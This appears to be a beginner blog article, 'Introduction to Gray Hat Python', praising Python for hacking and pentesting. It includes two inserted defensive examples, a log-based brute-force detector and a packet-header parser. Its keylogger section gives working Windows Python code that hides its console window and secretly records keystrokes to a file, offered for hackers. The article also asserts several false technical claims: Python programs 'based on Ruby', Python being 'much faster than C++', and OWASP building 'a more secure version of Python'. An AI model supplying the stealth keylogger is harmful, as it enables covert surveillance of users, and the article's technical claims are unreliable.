Introduction to Gray Hat Python
So, two years back, I was doing my research on programming languages; I started reading about C, C++, Assembly, Python and Ruby. I wanted to become an expert in Cyber Security, so I started learning as much as I could. I started with C, C++ and C# as the basics, and after learning and compiling lots of programs and viruses, I finally started learning Kali Linux. For those who don't know what Kali Linux is, it is an operating system for penetration testing. So, I was going on with my studies, and what I saw was that most of the programs, viruses and Trojans were compiled in Python, with their base being Ruby.
So, I stopped my studies for the time being and started learning Python or, to be precise, Gray Hat Python, and tadaa… It was extremely easy compared to C, C# or any other language I had learnt. I finally came to know why Python was the most used language and how it became famous.
Today, I will discuss how Python transformed into Gray Hat Python and why it is so extensively used that even Google and YouTube use it in their databases to give search results as accurate as possible.
Starting off, Python is a high-level programming language, which means its syntax is extremely easy to read, even for beginners. If you are new to programming, this is the language I would suggest you start with. Let me give you an example:
How does it look in Different Programming Languages?
Here is the same program written in different programming languages:
This is how it looks in C
#include <stdio.h>
int main()
{
    printf("Hello world\n");
    return 0;
}
This is how it looks in Java
class HelloWorld
{
    public static void main (String args[])
    {
        System.out.println ("Hello World");
    }
}
This is how it looks in Python (v2.7)
print "Hello World"
Simple? Yes, it is. So, Python is not only easy to write and understand but also very compact. So, you might be wondering how this led to Gray Hat Python.
Python vs Gray Hat Python
So, what exactly is Gray Hat Python? Why is it so different from our normal Python? The thing is, Gray Hat Python is nothing but programs written in Python by hackers, network stress testers and reverse engineers to create or crack a program. The term Gray Hat is used because it is not exactly beneficial or end-user software; it is used to secure systems or to create security-breaking software.
It can easily be used to test the limitations of a secure environment or to break into one. That's what Gray Hat means. And it's far easier to do in Python than in C, C++ or Java, hence the name Gray Hat Python. A few examples I can think of are:
• Writing key-loggers (for Hackers and Pentesters)
• Writing Security Shell Scripts (For Network Administrators)
• Writing an Automated IDS (Intrusion Detection System for Security Engineers)
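As an added example (not from the original article) of the third item above, here is the core of a small automated IDS check in Python: a few constructed sshd auth-log lines are scanned for a burst of failed logins from one source address, the brute-force pattern a network administrator's script would alert on. The log lines, the 5-failures-in-60-seconds threshold and the function names are all assumptions of this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
# Constructed sample lines in the sshd auth.log style (not from a real host).
SAMPLE_LOG = """\
Mar 10 09:12:01 host sshd[2201]: Failed password for invalid user admin from 203.0.113.7 port 51122 ssh2
Mar 10 09:12:03 host sshd[2201]: Failed password for invalid user admin from 203.0.113.7 port 51123 ssh2
Mar 10 09:12:04 host sshd[2201]: Failed password for root from 203.0.113.7 port 51124 ssh2
Mar 10 09:12:06 host sshd[2201]: Failed password for root from 203.0.113.7 port 51125 ssh2
Mar 10 09:12:09 host sshd[2201]: Failed password for root from 203.0.113.7 port 51126 ssh2
Mar 10 09:15:40 host sshd[2310]: Failed password for alice from 198.51.100.4 port 40001 ssh2
Mar 10 09:16:02 host sshd[2310]: Accepted password for alice from 198.51.100.4 port 40002 ssh2
Mar 10 09:40:00 host sshd[2500]: Failed password for bob from 198.51.100.4 port 40010 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+)"
)

def parse_line(line, year=2024):
    """Return (timestamp, result, user, ip) for an sshd auth line, or None if it does not match."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime("%d %s" % (year, m["ts"]), "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]

def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Map each source IP that reached `threshold` failed logins inside a sliding window
    to the largest failure count seen in any one window (empty dict when nothing fires)."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(list)   # ip -> timestamps of failures still inside the window
    alerts = {}
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, _user, ip = parsed
        if result != "Failed":
            continue
        # keep only failures that fall inside the window ending at this event
        recent[ip] = [t for t in recent[ip] if ts - t <= window] + [ts]
        if len(recent[ip]) >= threshold:
            alerts[ip] = max(alerts.get(ip, 0), len(recent[ip]))
    return alerts

if __name__ == "__main__":
    for ip, count in detect_bruteforce(SAMPLE_LOG).items():
        print("ALERT: %d failed logins from %s within 60s" % (count, ip))
```

The second address never fires because its two failures are 25 minutes apart, which is what the sliding window is for.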
So, now you know why and how Gray Hat Python is useful. To elaborate on this, let me give you some detailed examples.
You may have heard of Google App Engine. Google App Engine was originally designed in Python before it was ported. Google App Engine is a proper example of a program written in Python because it allows building web applications using its rich collection of libraries, tools and frameworks.
Ever wondered why it is so easy to search for something on Google? Most of the time, you get search results that are 80% accurate. This is because Python is extremely flexible, works at high speed, and its databases are much more compact even though they store 'n' amount of information. Python is so extensible that even YouTube uses it for purposes like viewing video, controlling templates, administering video, accessing canonical data, and many more.
Google has its crawlers and spiders, which gather data as soon as it is uploaded on the web, no matter where or how secure it is. One just needs proper inspiration, time and knowledge to gather this information.
Google searches were previously based on Python, which was later changed to C++ for speed optimization, because Google crawlers crawl many pages per second and each of them takes a few minutes to crawl successfully. Python, at present, is much faster than C++, but that wasn't the case a few decades ago.
There is a famous quote from Google:
“Python where we can, C++ where we must.”
So, you might be wondering how this can be used for hacking, pentesting and network security. I beg to differ. If you could create a program that is 70%-80% accurate in giving efficient search results, then you can probably build an application that can connect websites, search smartly and build a profile of a person, which individual Black Hats can use for malicious purposes. Leave individuals aside; anyone smart enough can easily build an application for building a company's profile, its whole tree from its root to whatever you can think of…
Information Gathering via Maltego
You may be thinking that I am exaggerating a bit. Nope, I am NOT!
Think of examples like Maltego. Maltego is software, or, to rephrase it better, an open-source forensics application built to gather information and build profiles of people, companies and other corporate agencies.
One just needs to enter proper data into the app, and the rest, like linking emails, people and groups of people, even determining internet infrastructure such as domains, DNS names, netblocks and IP addresses, can be linked and interconnected using this open-source intelligence.
For more information, see What is Maltego?
So, if access to “secret information” determines your success, then Maltego can help you discover it. Maltego is partially written in Python and uses Java as well, which is again a great language.
So much to quote about security from Google. To be more precise, Google is the last place you can expect to stay anonymous on the web, whether you use incognito mode or www.duckduckgo.com from Chrome, because ultimately everything is updated on the web. The point here is, it's not about invulnerability; it's about being absolutely vulnerable. One cannot completely wipe oneself off the Internet, but one can surely try to keep as little information on the web as possible.
Python is not just a language; it's a scripting language. Scripting languages allow you to write and modify your own tools when you need something more custom. Network security tools depend heavily on scripting languages for extensibility. For example, let's take Scapy.
Scapy is purely written in Python. It is a powerful interactive packet manipulation tool. It can generate fake packets on its own, scan networks, and even sniff packets.
Find detailed information in What is Scapy?
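To show what a packet manipulation tool such as Scapy does underneath when it sniffs, here is an added example (not from the original article and not Scapy's own code) that decodes a hand-assembled IPv4/TCP SYN packet using only the Python standard library and verifies its IPv4 header checksum, the integrity check a sniffer or IDS applies before trusting a header. The packet bytes and the function names are constructed for this example.

```python
import socket
import struct

# Constructed sample: a 40-byte IPv4/TCP SYN from 192.168.1.10:40000 to 192.168.1.20:22,
# hand-assembled for this example (not a real capture). IPv4 header checksum is 0xE52D.
SAMPLE_PKT = bytes.fromhex(
    "4500 0028 1234 0000 4006 e52d c0a8 010a c0a8 0114"   # IPv4 header (IHL 5, TTL 64, proto 6)
    "9c40 0016 0000 0001 0000 0000 5002 2000 0000 0000"   # TCP header, SYN flag set
)

def ipv4_checksum(header):
    """RFC 1071 one's-complement sum over 16-bit words (odd length is padded with a zero byte)."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:                       # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def parse_ipv4_tcp(pkt):
    """Decode IPv4 and TCP headers into a dict; return None if the packet is malformed."""
    if len(pkt) < 20:
        return None
    ver_ihl, _tos, total_len, _ident, _frag, ttl, proto, csum, src, dst = \
        struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or len(pkt) < ihl or total_len > len(pkt):
        return None
    # Recompute the header checksum with the checksum field zeroed and compare with the stored one.
    zeroed = pkt[:10] + b"\x00\x00" + pkt[12:ihl]
    info = {
        "src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst),
        "ttl": ttl, "proto": proto, "checksum_ok": ipv4_checksum(zeroed) == csum,
    }
    if proto == 6 and len(pkt) >= ihl + 20:  # TCP: ports, sequence number and SYN/ACK flags
        sport, dport, seq, _ack, _off, flags = struct.unpack("!HHIIBB", pkt[ihl:ihl + 14])
        info.update({"sport": sport, "dport": dport, "seq": seq,
                     "syn": bool(flags & 0x02), "ack": bool(flags & 0x10)})
    return info

def corrupt(pkt, index):
    """Return a copy of pkt with one byte inverted, to show the checksum check catching damage."""
    return pkt[:index] + bytes([pkt[index] ^ 0xFF]) + pkt[index + 1:]
```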
Now, these are complex programs written by advanced programmers. Let's see how simple it is to write a program in Python that can be easily understood by people who have good basics in programming.
How is a keylogger written in Python?
Following is the code for a keylogger written in Python:
#!/usr/bin/python
import pyHook
import pythoncom
import win32gui
import win32console
log_file = "log_file.txt" # name of log file
window = win32console.GetConsoleWindow() # get the script's console window
win32gui.ShowWindow(window, 0) # hide window
def pressed_chars(event): # on key pressed function
    if event.Ascii:
        f = open(log_file, "a") # (open log_file in append mode)
        char = chr(event.Ascii) # (insert real char in variable)
        if char == "q": # (if char is q)
            f.close() # (close and save log file)
            exit() # (exit program)
        if event.Ascii == 13: # (if char is "return")
            f.write("\n") # (new line)
        f.write(char) # (write char)
        f.close() # (flush the line to disk before the next key arrives)
proc = pyHook.HookManager() # open pyHook
proc.KeyDown = pressed_chars # set pressed_chars function on KeyDown event
proc.HookKeyboard() # start the function
pythoncom.PumpMessages() # get input
So, this is far easier, if you ask me. I have simply added the modules pyHook, pythoncom, win32gui and win32console, which you can easily download from the SourceForge website, and I have written the comments using the hash sign. But if I have to write the same program in C++, let's see how hard that can be.
This is a program written in C++.
#include <fstream>
#include <iostream>
#include <vector>
int main(int argc, char ** argv){
    using namespace std; /*Easier*/
    /* the empty "" entries are taken as spaces, so the file reads "STOP LOOKING FOR MALWARE" */
    vector<char> input_STRUCT   = {'S', 'T', 'O'};
    vector<char> input_STRUCT_1 = {'P', ' '};
    vector<char> input_STRUCT_2 = {'L', 'O', 'O', 'K', 'I', 'N', 'G'};
    vector<char> input_STRUCT_3 = {' ', 'F', 'O', 'R'};
    vector<char> input_STRUCT_4 = {'M', 'A', 'L', 'W'};
    vector<char> input_STRUCT_5 = {'A', 'R', 'E'};
    ofstream os("C:\\users\\keylogger.txt");
    int i;
    long j; /* separate counter for the busy-wait delay loops, so the outer index is not disturbed */
    for( i = 0; i <=2; i++){
        os << input_STRUCT[i];
        for(j = 0; j <= 1000000; j++){
        }
    }
    for( i=0; i<=1;i++){
        os << input_STRUCT_1[i];
        for(j = 0; j <= 1000000; j++){
        }
    }
    for(i=0; i<=6; i++) {
        os << input_STRUCT_2[i];
        for(j = 0; j <= 1000000; j++){
        }
    }
    for(i=0; i<=3;i++){
        os << input_STRUCT_3[i];
        for(j = 0; j <= 1000000; j++){
        }
    }
    for(i=0; i<=3; i++){
        os << input_STRUCT_4[i];
        for(j = 0; j <= 1000000; j++){
        }
    }
    for(i=0; i<=2; i++){
        os << input_STRUCT_5[i];
        for(j = 0; j <= 1000000; j++){
        }
    }
    os.close();
    ifstream is("C:\\users\\keylogger.txt");
    cout << is.rdbuf(); /* print the file back */
    return 0;
}
So, this is pretty large compared to Python. And if we talk about efficiency, then Python can be easily compiled into an executable without any effort using the py2exe software. Whereas if I talk about C++, then, frankly speaking, this code is a joke. To write a proper keylogger, one needs to write a DLL which implements the WH_KEYBOARD hook. Besides, this code is far from easy for a beginner to understand.
Open Source Hacking
Now, this takes care of Black Hat hackers, who, to be more precise, are the people who intend to destroy or manipulate data for their own needs. From a security point of view, Python is also useful for White Hat hackers, who intend to protect society from malicious hackers' attacks. If you want to develop a career in security research, or at least want to learn Python for it, then you can surely get in deep with OWASP, BRO or Quick NIX Secure Script.
OWASP is the Open Web Application Security Project. OWASP aims to create a more secure version of Python that makes it easier for security professionals and developers to write software less prone to hackers' attacks. It is related to black-box analysis, identifying and addressing security-related issues that can affect Python's interactive interpreter.
BRO is a network security and traffic monitoring program, whereas Quick NIX is used to harden and secure file ownership on the fly.
Since we are speaking of security, let's talk about an operating system that is partially based on Python. Python works great with UNIX, Linux and Debian. One of the most famous operating systems was BackTrack 5. Different versions were released. It was specifically designed for pentesting. Later on, the people at Offensive Security thought that BackTrack needed a reboot because most of the tools were either not working properly or were not supported.
Later on, they released Kali Linux, which is totally based on Debian, and most of its framework is in either Ruby or Python. Ruby, too, is an awesome scripting language, but I would prefer Python over it any time, the reason being that Python has a more diverse community with Linux, and it's more direct and easy to debug. Whereas Ruby has tons of features and is quick to adapt to its surrounding environment, it can be hard to debug, hard to read, and more sophisticated than Python.
The best analogy would be comparing Apple vs Linux, or iPhone vs Android. Apple is rich in resources, is extremely smooth, and is more biased towards beginners. Whereas Linux/Android is more user-friendly, a bit laggy and can be a headache sometimes if you don't know how to configure or maintain it.
There is even a book on Gray Hat Python by Justin Seitz. It deals specifically with automating tedious reverse engineering and security-related tasks, designing your own debugger, library and DLL injection, sniffing secure traffic over an encrypted session, using Immunity Debugger, Sulley and many more. It's an awesome book; it doesn't matter whether you are a beginner or an expert, you will always learn something new every time you read it.
Conclusion
So, if you are a beginner, Python would be the right choice to start with as your first programming language for security testing.
Just remember one thing in the end: Gray Hat Python is not just a language; it's a way to do things in a proper and fast manner.